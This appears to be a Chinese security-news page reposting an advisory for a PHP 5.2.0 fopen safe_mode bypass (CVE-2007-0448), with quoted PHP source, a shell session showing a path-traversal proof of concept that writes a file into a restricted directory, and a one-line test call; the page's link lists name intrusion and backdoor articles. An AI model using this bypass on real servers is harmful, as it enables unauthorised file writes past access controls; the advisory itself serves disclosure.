·	没有路由密码权限时的鸽	08-23	·	讨论net.exe和net1.exe的	10-10
·	让3389远程桌面传输更通	10-10	·	巧妙入侵渗透赌博站	10-10
·	Aspx空间扫权限工具	10-10	·	Windows2003最新提权工具	10-10
·	易淘乐提供100M免费全能	10-10	·	系统开机密码忘了不着急	10-09
·	中意网络提供免费100M免	10-09	·	与众不同 Windows XP开始	10-08
·	让桌面图标翻跟斗在XP上	10-08	·	上海宽元站长资助计划-提	10-08
·	个性化Windows XP的任务	10-07	·	趣盘提供3G免费网络硬盘	10-07
·	秀山热线提供200MB免费全	10-07	·	一次艰辛的提权过程	10-06
·	成功入侵IT大卖场的渗透	10-06	·	mysqlhack- MYSQL利用工	10-06
·	lanker一句话PHP后门客户	10-06	·	WIXI提供3G免费多媒体网	10-06
·	新人网络提供100M/ftp免	10-06	·	如何利用QQ带来高流量	10-05
·	UuShare提供免费网络文件	10-05	·	COA资源论坛为新手站长提	10-05
·	Win XP系统下27招释放C盘	10-04	·	免费的家族网络相册－My	10-04
·	日照网络提供100MB免费全	10-04	·	Oosah提供1024G免费网络	10-03

[推荐]PHP fopen Safe_Mode绕过安全限制漏洞

荐 ★★★

PHP fopen Safe_Mode绕过安全限制漏洞

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-2-1 9:54:39

受影响系统：
PHP PHP 5.2.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 22261
CVE(CAN) ID: CVE-2007-0448

PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。

PHP对fopen的实现上存在漏洞，远程攻击者可能利用此漏洞使用写模式绕过safe_mode的安全限制。

在fopen()函数中：

- -845-845--- Code from PHP520 ext/standard/file.c [START]
stream = php_stream_open_wrapper_ex(filename, mode, (use_include_path ? USE_PATH : 0) |
ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL, context);
- -845-845--- Code from PHP520 ext/standard/file.c [END]

在safe_mode.c文件中：

- -142-152--- Code from main/safe_mode.c [START]
ret = VCWD_STAT(path, &sb);
if (ret < 0) {
if ((flags & CHECKUID_NO_ERRORS) == 0) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Unable to access %s", filename);
}
return 0;
}
duid = sb.st_uid;
dgid = sb.st_gid;
if (duid == php_getuid()) {
return 1;
- -142-152--- Code from main/safe_mode.c [END]

如果duid == php_getuid()的话，就可以绕过safe_mode。

#define VCWD_STAT(path, buff) virtual_stat(path, buff TSRMLS_CC)

在virtual_stat()函数中：

- -831-845--- Code from TSRM/tsrm_virtual_cwd.c [START]
CWD_API int virtual_stat(const char *path, struct stat *buf TSRMLS_DC)
{
cwd_state new_state;
int retval;

CWD_STATE_COPY(&new_state, &CWDG(cwd));
if (virtual_file_ex(&new_state, path, NULL, 1)) {
return -1;
}

retval = stat(new_state.cwd, buf);

CWD_STATE_FREE(&new_state);
return retval;
}
- -831-845--- Code from TSRM/tsrm_virtual_cwd.c [END]

因此用户可以尝试创建/dir/pliczek文件。

cxib# uname -a
FreeBSD cxib.laptop 6.2-RELEASE FreeBSD 6.2-RELEASE #0: Fri Jan 12 08:43:30 UTC 2007
root@portnoy.cse.buffalo.edu:/usr/obj/usr/src/sys/SMP amd64
cxib# php -r 'fopen("/dir/pliczek", "a");'

Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1030 is not
allowed to access /dir owned by uid 80 in Command line code on line 1

Warning: fopen(/dir/pliczek): failed to open stream: Invalid argument in Command line code on
line 1
cxib# php -r 'fopen("compress.zlib://../../../../../../../dir/pliczek",
"a");'

Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is 1030 is not
allowed to access /dir owned by uid 80 in Command line code on line 1

Warning: fopen(compress.zlib://../../../../../../../dir/pliczek): failed to open stream:
Invalid argument in Command line code on line 1

cxib# php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'
cxib# ls -la /dir/pliczek
- -rw-r--r-- 1 cxib www 0 Jan 19 21:26 /dir/pliczek

<*来源：Maksymilian Arciemowicz （max@jestsuper.pl）

链接：http://securityreason.com/achievement_securityalert/44
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

fopen("compress.zlib://../../../../../../../dir/pliczek", "a");

建议：
--------------------------------------------------------------------------------
厂商补丁：

PHP
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.php.net

新闻录入：sygbox 责任编辑：sygbox

上一篇新闻：思科路由器惊现漏洞影响我国骨干网安全

下一篇新闻： Microsoft Word 2000中存在远程任意代码执行漏洞

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

MySQL联合创始人向Sun递交辞呈	10-10
惠普未来两年将在英国裁员近3500	10-10
英特尔买下Netbook.com域名	10-10
你的摄像头和麦克风是如何被黑客	10-10
美国军队公开招募黑客进行网络战	10-10
不法分子利用一条短信骗了80余万	10-10
美大学生侵入佩林州长个人邮件账	10-10
6名黑客盗取网民账号转卖被判1-4	10-10
造谣广西将有9级强震江苏19岁黑客	10-10
中国IT竞争力指数排名全球第50位	10-09